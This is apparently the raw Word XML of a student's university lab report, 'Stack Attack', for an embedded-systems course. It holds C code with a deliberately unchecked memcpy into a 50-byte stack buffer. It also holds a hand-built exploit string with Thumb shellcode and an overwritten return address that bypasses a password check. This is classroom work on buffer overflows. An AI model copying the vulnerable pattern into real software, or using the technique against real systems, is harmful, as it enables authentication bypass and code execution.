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  <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Lab #3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Stack Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Zak Walton</w:t>
      </w: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  <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>EGR 424 – Dr. Parikh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F74B3C" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>6/7</w:t>
      </w:r>
      <w:r>
        <w:t>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8CD" w:rsidTr="000A38CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:lastRenderedPageBreak/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0A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t>#include "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hw_types.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t>#include "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>driverlib</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>debug.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t>#include "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>driverlib</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sysctl.h</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t>#include "drivers/rit128x96x4.h"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">volatile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gPasswordEntered</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = 0;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>addToHtml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0A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve"> // Function to display string to user's web browser.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve"> // Just a stub since this is not important.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve"> ;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD"/>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">void </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>printUserWelcome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userName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">, unsigned </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userNameLength</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve"> char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50] = "Welcome to the web site, ";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve"> // EXTRA CREDIT: Why can't you use </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>strcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>) and omit</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve"> // the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userNameLength</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> parameter?</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>memcpy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>buf+strlen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 xml:space="preserve">),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userNameLength</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>addToHtml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:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gPasswordEntered</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = 0; // Indicate user needs to enter a password</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD"/>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t>void main(void)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     // Set the clocking to run directly from the crystal.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>SysCtlClockSet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>SYSCTL_SYSDIV_1 | SYSCTL_USE_OSC | SYSCTL_OSC_MAIN |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     SYSCTL_XTAL_8MHZ);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     RIT128x96x4</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Init(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1000000); // Initialize the OLED display.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     // Replace 'Harold' and 6 with exploit string and its </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     // length</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>printUserWelcome</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">"\0\0\0" </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r>
              <w:t>// Front padding</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">                      "\x4f\xf0\x01\x06"    </w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>mov.w</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">   r6, #1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">                      "\x02\x96"            </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r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    r6, [</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, #8]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">          "\x40\xf2\x93\x1e</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t xml:space="preserve">"  </w:t>
            </w:r>
            <w:r>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">/ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>movw</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, #403</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">                      "\x70\x47"            </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">                      "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>"  /</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>/ End padding</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">                      "\xD1\x00\x00\x20", 43); // Place 0x200000D1 in the link register instead</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     if (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>gPasswordEntered</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">         RIT128x96x4</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>StringDraw(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"Success!", 32, 24, 15);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     else</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">         RIT128x96x4</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>StringDraw(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>"Failure!", 32, 24, 15);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t xml:space="preserve">     while (1);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000A38CD" w:rsidRDefault="000A38CD" w:rsidP="000A38CD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000A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CD"/>
    <w:rsid w:val="000A38CD"/>
    <w:rsid w:val="00F7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B9A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5B80799D-1037-4DBF-95FF-89E7B1C5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Walton</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Zachary Walton</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-06-07T21:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-06-07T21:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>